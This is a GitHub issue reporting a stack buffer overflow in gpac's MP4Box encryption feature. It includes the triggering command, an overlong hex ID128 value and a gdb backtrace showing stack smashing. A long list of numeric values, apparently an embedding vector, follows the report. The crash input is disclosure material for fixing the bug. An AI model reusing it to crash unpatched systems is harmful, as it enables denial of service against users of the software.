This is a GitHub Issue repo:gpac owner:gpac Title : buffer overflow issue 8# Issue date: --- start body --- there is a buffer overflow issue for crypt feature when use a crafted_drm_file.xml file. overflow occur when use a crafted ID128 value. root@ubuntu:/opt/niugx/cov_product/gpac/gpac-master/bin/gcc# gdb ./MP4Box (gdb) set args -crypt drm_file.xml overview.mp4 -out overview_encrypted.mp4 (gdb) r Starting program: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box -crypt drm_file.xml overview.mp4 -out overview_encrypted.mp4 [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". [CORE] 128bit blob is not 16-bytes long: 6770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C316770616363656E6364726D746F6F6C31 [XML/NHML] Cannot parse ID128 *** stack smashing detected ***: /opt/niugx/cov_product/gpac/gpac-master/bin/gcc/MP4Box terminated Program received signal SIGABRT, Aborted. 0x00007ffff725bc37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff725bc37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 #1 0x00007ffff725f028 in __GI_abort () at abort.c:89 #2 0x00007ffff72982a4 in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff73a4113 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff732fbbc in __GI___fortify_fail (msg=<optimized out>, msg@entry=0x7ffff73a40fb "stack smashing detected") at fortify_fail.c:38 #4 0x00007ffff732fb60 in __stack_chk_fail () at stack_chk_fail.c:28 #5 0x00007ffff7664910 in gf_xml_parse_bit_sequence_bs (bsroot=0x6950d0, bs=0x695200) at utils/xml_parser.c:2173 #6 0x00007ffff766495f in gf_xml_parse_bit_sequence (bsroot=0x6950d0, data=0x7ffffffbdcb8, data_size=0x7ffffffbdc84) at utils/xml_parser.c:2181 #7 0x00007ffff7954e85 in gf_cenc_parse_drm_system_info (mp4=0x670c20, drm_file=0x7fffffffe7db "drm_file.xml") at media_tools/ismacryp.c:2817 #8 0x00007ffff79553ec in gf_crypt_file (mp4=0x670c20, drm_file=0x7fffffffe7db "drm_file.xml") at media_tools/ismacryp.c:2898 #9 0x000000000042188c in mp4boxMain (argc=6, argv=0x7fffffffe548) at main.c:5202 #10 0x0000000000423d05 in main (argc=6, argv=0x7fffffffe548) at main.c:5712 Guoxiang Niu, EaglEye Team --- end body ---
4,460
[ -0.04308021068572998, 0.009427791461348534, -0.011896593496203423, -0.008812587708234787, 0.047106996178627014, 0.04579669237136841, -0.025630807504057884, 0.048193588852882385, -0.026030290871858597, 0.03055243380367756, -0.014181634411215782, 0.02751636691391468, 0.0036452794447541237, -0.016874147579073906, 0.012216179631650448, 0.02879471145570278, -0.00490564713254571, 0.0030180916655808687, -0.012399941682815552, -0.00611607963219285, 0.026413794606924057, -0.03755136951804161, 0.01601925492286682, 0.050111107528209686, -0.02491173893213272, 0.032565828412771225, 0.006379738450050354, -0.0022091390565037727, 0.002996120136231184, 0.027979766950011253, 0.010977784171700478, 0.02248288504779339, -0.003287742380052805, 0.020437533035874367, 0.025630807504057884, -0.024112774059176445, 0.03946888819336891, 0.06283063441514969, -0.0016318866983056068, -0.02642977423965931, -0.004825750831514597, -0.03409983962774277, -0.04659565910696983, 0.03227819874882698, -0.005157321225851774, 0.015867451205849648, -0.019606608897447586, -0.04161011427640915, -0.043240003287792206, -0.0030780138913542032, 0.01697002351284027, -0.038478169590234756, -0.030536456033587456, -0.057909008115530014, 0.002680528676137328, -0.042600832879543304, 0.02738853171467781, 0.014029831625521183, 0.017241671681404114, 0.004649978131055832, -0.00816542562097311, 0.014653024263679981, -0.004542117938399315, 0.024224629625678062, -0.010889897122979164, 0.024320505559444427, -0.0030140967573970556, 0.03489880636334419, -0.025183387100696564, 0.04371938481926918, -0.01633085124194622, -0.014509210363030434, 0.019926195964217186, 0.011632935144007206, 0.0007959692156873643, -0.04049156233668327, 0.038606006652116776, 0.017992699518799782, -0.007350481115281582, 0.032437991350889206, -0.031990572810173035, 0.03454726189374924, -0.023905042558908463, 0.021140621975064278, 0.007270584814250469, -0.017896823585033417, -0.056950248777866364, -0.0832202285528183, -0.04784204438328743, -0.03959672152996063, 0.009611552581191063, 0.016730334609746933, 0.01102572213858366, -0.01543601043522358, 0.008349187672138214, 0.018967436626553535, -0.030967896804213524, -0.00806555524468422, -0.058100759983062744, -0.03163902834057808, -0.05062244459986687, -0.007729989476501942, -0.017497340217232704, -0.001432145363651216, 0.017577238380908966, -0.007981663569808006, 0.019462795928120613, -0.023857105523347855, 0.018056616187095642, 0.12425509095191956, -0.004518148954957724, 0.0012034415267407894, 0.015180341899394989, 0.01931898109614849, 0.019734444096684456, 0.01608317159116268, -0.021428249776363373, -0.020101968199014664, -0.03480292856693268, 0.012367983348667622, 0.0063437847420573235, -0.01983032003045082, -0.03157510980963707, 0.016426727175712585, -0.012128293514251709, 0.05110182240605354, -0.023090098053216934, 0.011377266608178616, -0.036304984241724014, -0.009180111810564995, -0.05742963030934334, -0.00022183771943673491, 0.021955568343400955, -0.031143669039011, 0.015979306772351265, 0.0014860755763947964, -0.023233912885189056, 0.023777209222316742, 0.000023500815586885437, 0.033077165484428406, -0.060721367597579956, -0.02414473332464695, 0.024288546293973923, 0.015324154868721962, -0.04250495508313179, 0.0009412810322828591, -0.004474205896258354, -0.004354360979050398, -0.04486989229917526, 0.004382324870675802, 0.02332978881895542, -0.005373042076826096, 0.016794251278042793, 0.00737045519053936, 0.03566581383347511, 0.005716597195714712, 0.0014281505718827248, 0.02555091120302677, -0.010913866572082043, -0.022722573950886726, -0.008137461729347706, -0.03537818416953087, 0.029977180063724518, -0.026445752009749413, -0.015108434483408928, -0.049919355660676956, 0.04598844423890114, 0.026285959407687187, -0.024496277794241905, 0.028443166986107826, -0.0001449373085051775, -0.023425662890076637, 0.030360683798789978, 0.02687719464302063, -0.04394309222698212, -0.017753010615706444, 0.0154120409861207, 0.03614519163966179, -0.052763670682907104, 0.0007025901577435434, -0.03024882823228836, -0.005612731445580721, 0.011425204575061798, 0.007162724155932665, 0.001743741799145937, -0.0065315417014062405, 0.019654547795653343, -0.03550602123141289, 0.02102876827120781, -0.010490414686501026, -0.009228049777448177, 0.006635406985878944, -0.004590055905282497, -0.02320195361971855, 0.03480292856693268, 0.002480787457898259, -0.036560654640197754, -0.026333898305892944, -0.00011666142381727695, 0.0050734300166368484, 0.009683459997177124, -0.002243095077574253, -0.026158126071095467, -0.004062738735228777, -0.03806271031498909, 0.019350940361618996, -0.021508146077394485, 0.046531740576028824, 0.005492886528372765, -0.0032338122837245464, -0.030840061604976654, -0.005732576362788677, 0.014796838164329529, 0.009060267359018326, -0.04020393639802933, 0.013798131607472897, -0.004713895730674267, -0.0002659056626725942, -0.018392182886600494, -0.016858167946338654, 0.047043077647686005, 0.0026545622386038303, -0.005784509237855673, -0.019782381132245064, -0.01356643158942461, -0.03646477684378624, -0.017305588349699974, 0.03710395097732544, -0.011553038842976093, 0.013862048275768757, 0.03735961765050888, 0.023793186992406845, 0.0006132058915682137, 0.01848805882036686, 0.011017732322216034, 0.004857709165662527, 0.00002343839696550276, -0.0015719643561169505, -0.014093748293817043, 0.028826668858528137, -0.006016208790242672, 0.03419571742415428, -0.00024243604275397956, -0.02674935944378376, 0.0006656380137428641, 0.05870797485113144, -0.03246995061635971, 0.013830089941620827, -0.0244643185287714, 0.03157510980963707, -0.009148153476417065, 0.020757120102643967, 0.01874372735619545, 0.01448524184525013, -0.018200431019067764, -0.01684219017624855, 0.04231320321559906, 0.016442706808447838, -0.015587814152240753, -0.018248368054628372, 0.01867980882525444, -0.01264762133359909, -0.011864635162055492, -0.00015267728304024786, 0.02414473332464695, -0.018344243988394737, -0.0231859739869833, 0.011824687011539936, -0.01632286235690117, -0.03489880636334419, 0.011081648990511894, -0.036496736109256744, -0.013302773237228394, -0.026158126071095467, 0.009587584063410759, 0.004705905914306641, -0.004254490602761507, 0.004274464678019285, 0.012583703733980656, 0.011968500912189484, -0.0010895889718085527, 0.030983876436948776, 0.0052611869759857655, 0.02382514625787735, 0.0006766237784177065, -0.006191981490701437, -0.02820347622036934, 0.005436959210783243, -0.025902455672621727, 0.013941945508122444, 0.012591693550348282, 0.037519413977861404, -0.04886471852660179, 0.006986951921135187, 0.017241671681404114, 0.01613111048936844, -0.0019484767690300941, 0.0051653110422194, 0.0009717415669001639, 0.02369731105864048, -0.03604931756854057, -0.003643281990662217, -0.026893172413110733, -0.008756659924983978, -0.03489880636334419, 0.0041226609610021114, -0.013039113953709602, 0.04045960307121277, -0.003201853483915329, -0.011521080508828163, 0.03537818416953087, -0.0558956153690815, -0.03246995061635971, 0.0011385256657376885, -0.026445752009749413, -0.00930794607847929, 0.003711194032803178, -0.007658082991838455, -0.0317508839070797, 0.021172581240534782, 0.0037691190373152494, 0.025582870468497276, -0.02523132599890232, 0.012663600966334343, 0.020693201571702957, -0.011193504557013512, -0.021188560873270035, 0.0330452062189579, -0.06468423455953598, 0.012687569484114647, -0.006771231070160866, -0.029114296659827232, -0.004590055905282497, -0.025135450065135956, -0.017960740253329277, -0.021779794245958328, -0.01200844906270504, 0.00001679075649008155, 0.0190633125603199, -0.0013752190861850977, 0.0023010200820863247, 0.020948871970176697, 0.01299117598682642, 0.012216179631650448, -0.006563500035554171, 0.004869693890213966, 0.018344243988394737, 0.0030780138913542032, 0.001701796194538474, 0.0025606839917600155, 0.0011684867786243558, 0.01045046653598547, 0.0308081042021513, 0.026477711275219917, 0.01981434039771557, -0.003189869225025177, 0.027036987245082855, -0.021715877577662468, 0.01665043830871582, -0.020341657102108, -0.0058644055388867855, -0.0028662881813943386, 0.0031279493123292923, 0.025710703805088997, -0.0055727832950651646, -0.003277755342423916, 0.008900473825633526, 0.0071227760054171085, -0.010857938788831234, 0.004254490602761507, -0.027116883546113968, 0.03037666156888008, -0.03882971405982971, 0.03055243380367756, 0.005964276380836964, -0.002016388811171055, 0.01496462058275938, 0.005596752278506756, -0.01733754761517048, 0.013206897303462029, -0.04045960307121277, 0.028299352154135704, 0.02401689812541008, -0.06717700511217117, -0.008089523762464523, 0.02040557563304901, -0.020373616367578506, 0.04403897002339363, -0.0036872250493615866, -0.02026176080107689, -0.0521245002746582, 0.04061939939856529, -0.02909831702709198, -0.04403897002339363, -0.04167403280735016, 0.015547865070402622, -0.034035924822092056, -0.028315331786870956, 0.03729570284485817, -0.034323550760746, 0.030728207901120186, 0.0006731282919645309, -0.009363873861730099, -0.0034555250313133, -0.00896439142525196, 0.023553498089313507, 0.01780094765126705, -0.027228739112615585, 0.026381835341453552, -0.02762822061777115, 0.031543150544166565, -0.029497800394892693, 0.0005348074482753873, -0.004522143863141537, 0.021651960909366608, 0.00812947191298008, -0.009787325747311115, 0.019175168126821518, -0.04375134035944939, 0.03723178431391716, -0.027164822444319725, 0.026269979774951935, 0.0027084925677627325, -0.011073659174144268, 0.032310158014297485, 0.02815553918480873, -0.010746084153652191, 0.018919499590992928, 0.04624411463737488, -0.0066394018940627575, 0.015260238200426102, -0.003695214632898569, -0.00398883456364274, -0.0028483113273978233, -0.0020733149722218513, -0.029721511527895927, -0.052188415080308914, -0.04036372900009155, -0.025886477902531624, 0.0036672509741038084, -0.03541014343500137, 0.03381221368908882, 0.0022191263269633055, -0.013941945508122444, -0.00695499312132597, -0.03438746929168701, -0.028427187353372574, -0.02770811878144741, 0.0054609281942248344, -0.015611782670021057, -0.0037751111667603254, 0.0035254345275461674, 0.011361286975443363, -0.007010920904576778, 0.00554481940343976, 0.020293720066547394, -0.03946888819336891, -0.01987825706601143, 0.0501750223338604, 0.016346830874681473, -0.020101968199014664, 0.0030760166700929403, -0.017017962411046028, 0.007989653386175632, 0.05602344870567322, 0.016250954940915108, -0.012911279685795307, -0.013518493622541428, 0.0031319442205131054, -0.02745244838297367, 0.009987066499888897, 0.03330087661743164, -0.005456933286041021, -0.006855122745037079, -0.021779794245958328, 0.005329099018126726, 0.017161775380373, -0.0046899267472326756, -0.025950394570827484, -0.03550602123141289, 0.0007445358205586672, -0.03604931756854057, 0.003547406056895852, 0.02026176080107689, 0.013302773237228394, -0.013742203824222088, -0.0196865051984787, -0.025694726034998894, 0.0003994826693087816, -0.006435665767639875, 0.008820577524602413, -0.024304525926709175, 0.010913866572082043, -0.02941790409386158, 0.01995815336704254, -0.007326512131839991, -0.005468917544931173, 0.024927718564867973, 0.04410288855433464, 0.026190083473920822, -0.020357636734843254, -0.04502968490123749, 0.024352462962269783, 0.008077539503574371, 0.03988435119390488, -0.017625175416469574, -0.013254835270345211, 0.04314412921667099, 0.004949590191245079, -0.02211536094546318, -0.01645868644118309, -0.013222876004874706, -0.02585451863706112, -0.026541627943515778, -0.009411811828613281, -0.057461585849523544, 0.019398879259824753, -0.011217473074793816, 0.032246239483356476, -0.006207960657775402, -0.014820806682109833, -0.02192360907793045, -0.013870038092136383, 0.022131340578198433, 0.04186578467488289, 0.01607518270611763, 0.016226986423134804, -0.011297370307147503, 0.01780094765126705, 0.0001856346061686054, -0.009835263714194298, 0.0022970254067331553, -0.014868744648993015, 0.019750423729419708, 0.0014621065929532051, 0.02216329798102379, 0.0053211092017591, -0.007865813560783863, -0.01387802790850401, -0.0013462565839290619, -0.029146255925297737, 0.03223026171326637, -0.042345162481069565, 0.01880764402449131, -0.0177849680185318, 0.021460209041833878, 0.009547635912895203, 0.01403782144188881, 0.020821036770939827, -0.03106377273797989, -0.007829860784113407, -0.012224169448018074, 0.006915044970810413, -0.0015919384313747287, 0.01780094765126705, 0.017896823585033417, -0.0016778272110968828, 0.0053810314275324345, 0.0054769073612987995, 0.02254680171608925, 0.006635406985878944, 0.010202787816524506, -0.012863341718912125, -0.008049575611948967, -0.0010012034326791763, 0.0012214182643219829, 0.01944681629538536, 0.019926195964217186, -0.042153410613536835, -0.0061560277827084064, 0.007761948276311159, -0.016362810507416725, 0.02301020175218582, 0.02141227200627327, -0.017689092084765434, 0.009611552581191063, 0.0037091965787112713, 0.0064236815087497234, -0.008045581169426441, -0.0029581692069768906, 0.006527546793222427, -0.029258111491799355, -0.01684219017624855, 0.0014461273094639182, 0.022466905415058136, -0.030664289370179176, -0.008716711774468422, 0.01621100679039955, -0.02991326153278351, -0.020677223801612854, -0.014501220546662807, 0.014924672432243824, 0.0035893518943339586, -0.029977180063724518, 0.006215950474143028, -0.011433194391429424, 0.01261566299945116, 0.019558671861886978, 0.014868744648993015, -0.01359838992357254, -0.028491104021668434, 0.04058744013309479, 0.008073545061051846, -0.03953280672430992, -0.012184221297502518, 0.012288087047636509, 0.015100444667041302, 0.0030919958371669054, -0.023713290691375732, 0.0254070982336998, 0.02821945585310459, 0.010410518385469913, 0.06551516056060791, -0.005456933286041021, 0.024368442595005035, 0.014277510344982147, 0.027292655780911446, 0.0002611617965158075, -0.01041850820183754, 0.002880270127207041, 0.031287483870983124, -0.048193588852882385, 0.01829630695283413, -0.03710395097732544, 0.031239544972777367, 0.001228409237228334, -0.027532344684004784, -0.030520476400852203, -0.011600976809859276, -0.015444000251591206, -0.049280181527137756, 0.013550451956689358, -0.01575559563934803, -0.017193734645843506, -0.0317508839070797, -0.0008034594939090312, -0.009228049777448177, -0.002217128872871399, -0.008972380310297012, -0.0049815489910542965, -0.01791280321776867, 0.01861589215695858, -0.02833131141960621, -0.007749964017421007, -0.023106077685952187, 0.01175278052687645, -0.016242966055870056, 0.012631641700863838, 0.011145566590130329, 0.015779566019773483, -0.02275453321635723, -0.0158834308385849, -0.008764649741351604, 0.018264347687363625, 0.014349417760968208, -0.04726678878068924, 0.017960740253329277, 0.037263743579387665, -0.019111251458525658, -0.008253311738371849, -0.04502968490123749, -0.02299422211945057, 0.003449532901868224, -0.006487598642706871, 0.017673112452030182, 0.001720771542750299, -0.02269061654806137, -0.022578760981559753, -0.005141342058777809, 0.009076246060431004, 0.004773817956447601, -0.014724931679666042, 0.006080126389861107, 0.008644805289804935, -0.013894007541239262, -0.02002207189798355, 0.009172121994197369, 0.019494755193591118, -0.009267997927963734, -0.02960965596139431, -0.0009852241491898894, -0.007458341307938099, -0.004582066088914871, -0.027500387281179428, -0.029274089261889458, 0.009699439629912376, -0.020101968199014664, -0.0011285385116934776, -0.030073055997490883, -0.024432359263300896, 0.03518643230199814, 0.0018865568563342094, 0.02085299603641033, 0.0628945529460907, -0.012639631517231464, -0.0088924840092659, -0.0005672653787769377, -0.014764879830181599, -0.027404511347413063, -0.0019035348668694496, -0.04611627757549286, -0.012599683366715908, -0.024735966697335243, -0.0061560277827084064, -0.0013712242944166064, 0.01812053471803665, -0.0019165180856361985, 0.002141227014362812, -0.004757838789373636, -0.004118666518479586, -0.020741140469908714, 0.010666186921298504, -0.0035094553604722023, 0.015587814152240753, 0.005680643487721682, -0.02542307786643505, 0.015899410471320152, 0.011640924960374832, -0.004769823048263788, 0.00861284602433443, -0.004226526711136103, -0.031926654279232025, -0.027692139148712158, -0.021060725674033165, -0.0028523062355816364, 0.013103031553328037, 0.0038869662676006556, 0.026925131678581238, 0.016538582742214203, -0.00562471617013216, -0.014812817797064781, -0.02879471145570278, 0.019606608897447586, 0.004765828140079975, -0.011289380490779877, 0.005764534696936607, 0.013326741755008698, 0.00930794607847929, -0.0058484263718128204, 0.018839603289961815, 0.01289530098438263, -0.0013612371403723955, -0.0027444460429251194, -0.049344100058078766, -0.0009567610104568303, -0.0317508839070797, -0.00035853570443578064, 0.008732691407203674, -0.028043683618307114, 0.032437991350889206, 0.00622793473303318, 0.03317303955554962, 0.01925506442785263, -0.03291737288236618, -0.031415317207574844, -0.004210547544062138, 0.01521230023354292, -0.010170828551054, 0.006779220886528492, -0.017753010615706444, -0.01733754761517048, 0.006112084724009037, -0.006966977845877409, -0.008980370126664639, 0.032246239483356476, 0.005101393908262253, 0.02032567746937275, -0.012176231481134892, 0.01855197548866272, -0.028539041057229042, -0.0023429659195244312, -0.031031813472509384, -0.025518953800201416, -0.010098922066390514, 0.023921022191643715, -0.035985399037599564, 0.004518148954957724, 0.025007614865899086, 0.023169994354248047, -0.003028078703209758, -0.010849948972463608, 0.008988359943032265, -0.03031274490058422, 0.018520016223192215, 0.003435550956055522, -0.013590400107204914, 0.02516740746796131, -0.01404581032693386, 0.005109383258968592, 0.017209714278578758, -0.0046859318390488625, -0.0003433054080232978, 0.03499468043446541, -0.03068026900291443, -0.0011155554093420506, 0.0015969319501891732, 0.01340663805603981, 0.02414473332464695, -0.005488892085850239, 0.0003370635095052421, 0.03652869537472725, -0.0025526941753923893, -0.033141084015369415, -0.0330452062189579, -0.01994217559695244, -0.004857709165662527, -0.016155079007148743, 0.020293720066547394, -0.03509055823087692, 0.002075312426313758, -0.008381146006286144, 0.0032238252460956573, 0.01493266224861145, -0.010953814722597599, 0.006475613918155432, -0.0017587224720045924, 0.014868744648993015, -0.02324989065527916, -0.016682395711541176, 0.03652869537472725, -0.020789077505469322, 0.011760769411921501, -0.013510503806173801, -0.027692139148712158, 0.027500387281179428, -0.010114900767803192, 0.02820347622036934, 0.016490643844008446, -0.00127434975001961, 0.016226986423134804, 0.00953165628015995, -0.04049156233668327, -0.010242735967040062, 0.0075901709496974945, 0.010082942433655262, 0.029657592996954918, -0.0015050509246066213, 0.0022670640610158443, -0.035921480506658554, 0.018152492120862007, -0.013710245490074158, -0.015491938218474388, -0.01531616598367691, -0.03608127310872078, -0.00797766912728548, -0.052252333611249924, 0.007849834859371185, -0.0016928077675402164, 0.013206897303462029, 0.01448524184525013, 0.014301479794085026, 0.023457622155547142, 0.007382439915090799, 0.03162304684519768, -0.003888963721692562, -0.001602924196049571, -0.012128293514251709, -0.03451530262827873, 0.027148842811584473, -0.00600422453135252, 0.030840061604976654, 0.0044981748796999454, -0.02781997248530388, 0.005345078185200691, 0.0007305539329536259, 0.0005677647422999144, 0.003129946766421199, -0.06404506415128708, 0.006104095373302698, -0.02726069651544094, -0.02344164252281189, -0.026349876075983047, 0.0007869808468967676, -0.011225462891161442, -0.03197459131479263, -0.013262825086712837, 0.011832676827907562, -0.002528725191950798, 0.011345308274030685, 0.024608133360743523, -0.009451759979128838, 0.0019155193585902452, -0.0075102741830050945, 0.0055687883868813515, 0.0032677683047950268, -0.023169994354248047, 0.0036312974989414215, -0.015515906736254692, -0.03162304684519768, 0.026733379811048508, -0.007769938092678785, -0.011640924960374832, -0.03806271031498909, -0.012399941682815552, 0.006563500035554171, 0.02237102948129177, -0.011832676827907562, -0.03483488783240318, -0.009955108165740967, 0.0006541528855450451, -0.014181634411215782, -0.028858628123998642, 0.005401005502790213, 0.00016865659563336521, -0.014589106664061546, 0.004042764659970999, 0.04496577009558678, 0.004234516527503729, 0.011600976809859276, 0.0018286319682374597, -0.0019464793149381876, -0.009539646096527576, -0.006647391710430384, -0.02813955955207348, -0.014956630766391754, -0.001215426018461585, -0.03464313596487045, 0.02662152424454689, 0.0030240837950259447, 0.06410897523164749, -0.010658198036253452, -0.002177180489525199, -0.01943083666265011, 0.036496736109256744, 0.015004568733274937, -0.04413484409451485, -0.02770811878144741, 0.0010256717214360833, 0.007170713972300291, 0.004060741513967514, 0.006567494943737984, -0.0206612441688776, 0.008037591353058815, 0.008596867322921753, 0.021188560873270035, -0.005860410630702972, -0.01276746578514576, -0.0023030175361782312, -0.014477252028882504, -0.03614519163966179, 0.016123119741678238, 0.013702255673706532, 0.01521230023354292, -0.02038959600031376, -0.012192211113870144, 0.005824457388371229, -0.0010022021597251296, -0.0025626812130212784, -0.03194263577461243, -0.03918125852942467, -0.038478169590234756, -0.017689092084765434, -0.010690156370401382, -0.01645868644118309, -0.009987066499888897, 0.018727747723460197, -0.026094207540154457, -0.008153441362082958, -0.021044747903943062, 0.005616726353764534, 0.014908692799508572, 0.0520925410091877, -0.016698375344276428, -0.016570542007684708, -0.00687909172847867, 0.011696852743625641, -0.021380312740802765, -0.004486190155148506, -0.034035924822092056, -0.01540405210107565, -0.008940421976149082, -0.04010805860161781, -0.014021841809153557, 0.05915539339184761, 0.01728961057960987, 0.049727603793144226, -0.017832906916737556, -0.027021007612347603, -0.013550451956689358, -0.021955568343400955, -0.002900244202464819, -0.008820577524602413, 0.021955568343400955, -0.007006925996392965, -0.016306882724165916, -0.018344243988394737, 0.004681936930865049, 0.019926195964217186, -0.001330277300439775, -0.0006796199013479054, 0.0010855941800400615, 0.011497111059725285, 0.017768988385796547, -0.05806880071759224, 0.048641011118888855, 0.01477286871522665, -0.0066553810611367226, -0.024064835160970688, -0.008556919172406197, -0.03499468043446541, -0.029561717063188553, -0.010889897122979164, 0.008940421976149082, 0.0012094337726011872, 0.000495108834002167, 0.008089523762464523, 0.011097628623247147, 0.016922086477279663, -0.002231110818684101, 0.011169535107910633, -0.010817990638315678, 0.017449403181672096, 0.005992240272462368, 0.01283937320113182, 0.008852535858750343, -0.008988359943032265, -0.004266474861651659, 0.01792878285050392, 0.026973070576786995, 0.03691219910979271, -0.013558441773056984, 0.03183078020811081, -0.03387613222002983, -0.008852535858750343, 0.009763356298208237, 0.023745249956846237, -0.012184221297502518, 0.0028782726731151342, 0.016290903091430664, 0.025886477902531624, 0.021044747903943062, 0.0008054569480009377, -0.007582181133329868, 0.02948182076215744, -0.01995815336704254, -0.02008598856627941, 0.011569018475711346, -0.026317918673157692, -0.02313803695142269, 0.011073659174144268, 0.029721511527895927, 0.01943083666265011, -0.049152348190546036, -0.01299117598682642, -0.01175278052687645, 0.00819738395512104, -0.0041146716102957726, -0.00014618568820878863, 0.012887311168015003, -0.006164017599076033, 0.029977180063724518, 0.0037850982043892145, 0.046787410974502563, -0.02523132599890232, -0.002426857128739357, -0.003181879408657551, 0.004008808638900518, -0.016362810507416725, 0.008349187672138214, -0.020741140469908714, -0.009955108165740967, -0.032885413616895676, 0.006028193514794111, -0.034323550760746, -0.016858167946338654, -0.028682855889201164, -0.017001982778310776, 0.019239084795117378, -0.02465607039630413, 0.0005962278810329735, 0.007298548240214586, 0.0142934899777174, 0.002093289280310273, -0.025071531534194946, 0.03678436577320099, -0.032821495085954666, 0.009491708129644394, -0.0056486851535737514, -0.029114296659827232, -0.037775080651044846, -0.02115660160779953, -0.004266474861651659, 0.0025067536626011133, 0.0003982342896051705, -0.05375438928604126, 0.026525650173425674, 0.0008548928890377283, -0.014061789959669113, 0.015803534537553787, -0.010474435985088348, -0.024863801896572113, -0.020980829373002052, -0.007953699678182602, -0.0029941226821392775, -0.04237712174654007, 0.013358700089156628, 0.0425688736140728, 0.10495208948850632, -0.002518738154321909, 0.006515562534332275, -0.021076705306768417, 0.005576778203248978, 0.004258485045284033, 0.013230865821242332, 0.01242391113191843, 0.010730104520916939, 0.02408081479370594, 0.015667710453271866, -0.007478315383195877, 0.004773817956447601, -0.00023731766850687563, 0.010498404502868652, 0.012815403752028942, -0.003659261157736182, -0.012535765767097473, 0.0017607198096811771, -0.003994826693087816, 0.000638672907371074, 0.02134835347533226, 0.0019644559361040592, -0.006887081079185009, 0.024767925962805748, -0.017944760620594025, -0.00756220705807209, -0.029210172593593597, -0.012911279685795307, -0.016730334609746933, -0.001018680864945054, -0.012431900948286057, -0.017992699518799782, -0.0028323321603238583, 0.0005527841276489198, 0.023233912885189056, 0.017768988385796547, -0.007302543148398399, -0.00760615011677146, -0.007454346399754286, 0.003477496560662985, 0.006092110648751259, 0.004554102662950754, 0.013103031553328037, 0.0005552808870561421, -0.03246995061635971, 0.03253386914730072, 0.006215950474143028, -0.0029941226821392775, -0.023409685119986534, -0.0016528595006093383, -0.020693201571702957, 0.03550602123141289, 0.027692139148712158, 0.009547635912895203, 0.015667710453271866, 0.011808707378804684, 0.0006836146931163967, -0.008932432159781456, -0.0022191263269633055, -0.012999165803194046, 0.01098577305674553, 0.004737864248454571, 0.02299422211945057, 0.0024608131498098373, -0.008213363587856293, -0.03031274490058422, 0.01490070391446352, -0.007098807021975517, 0.0356018953025341, 0.008604857139289379, 0.004626009147614241, 0.004530133679509163, -0.005752550438046455, 0.03068026900291443, 0.029433883726596832, -0.005740566179156303, 0.024320505559444427, -0.04007610306143761, -0.005800488404929638, 0.012168241664767265, 0.030520476400852203, -0.014421324245631695, 0.006387727800756693, -0.013862048275768757, 0.034419428557157516, -0.013470555655658245, -0.0016199022065848112, -0.002650567563250661, -0.006875096820294857, 0.006903060711920261, 0.01515637245029211, 0.018647851422429085, 0.03406788036227226, 0.010586290620267391, 0.020293720066547394, -0.009204080328345299, -0.026989048346877098, -0.014157665893435478, 0.000036171906685922295, 0.017385486513376236, 0.0011584997409954667, 0.02941790409386158, -0.0019285025773569942, -0.02045351266860962, 0.007658082991838455, 0.018823623657226562, 0.012168241664767265, 0.013262825086712837, -0.006915044970810413, -0.0317828394472599, -0.010362580418586731, 0.014341427944600582, 0.0013882023049518466, -0.0330452062189579, 0.0012214182643219829, 0.007210662122815847, 0.009355884045362473, -0.010178818367421627, -0.032757580280303955, -0.02534317970275879, -0.011992469429969788, 0.024224629625678062, -0.019366919994354248, 0.005137347150593996, 0.023217933252453804, -0.0003398099506739527, -0.028539041057229042, 0.042536914348602295, 0.02497565560042858, 0.016874147579073906, -0.001425154390744865, 0.005652679596096277, 0.011017732322216034, 0.022147318348288536, -0.016986003145575523, 0.019910216331481934, 0.010698146186769009, 0.004769823048263788, -0.002716482151299715, -0.0052891504019498825, 0.013230865821242332, 0.008105503395199776, 0.024240609258413315, -0.009451759979128838, 0.003199856262654066, 0.009291966445744038, 0.01989423669874668, 0.004530133679509163, 0.0020733149722218513, -0.006179996766149998, -0.012583703733980656, 0.019974132999777794, 0.029497800394892693, 